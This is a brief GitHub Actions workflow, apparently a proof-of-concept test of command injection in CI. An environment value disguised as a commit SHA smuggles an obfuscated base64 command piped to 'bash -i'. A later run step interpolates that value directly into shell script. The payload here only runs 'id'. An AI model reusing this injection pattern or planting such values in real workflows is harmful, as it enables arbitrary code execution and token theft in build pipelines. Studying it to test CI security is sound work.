name: GitHub Actions
on: 
  push:

env:
  repo_value: "s1n-cicd-tests/checkout"
  action_version: '0214781bd089a5c6215374a7c3e98d7c505b35d0?test=";{echo,aWQK}|{base64,-d}|{bash,-i};echo"'

jobs:
  init:
    runs-on: ubuntu-latest
    name: "init"
    steps:
    - run: | 
        shaUrl="/repos/$repo_value/commits/$action_version"
        echo $shaUrl
        gh api -H "Accept: application/vnd.github+json" -H "X-GitHub-Api-Version: 2022-11-28" $shaUrl
      env:
        GH_TOKEN: ${{ github.token }}
    - run: |
        BRANCH_NAME="actions_${{ env.action_version }}_"
        pwd

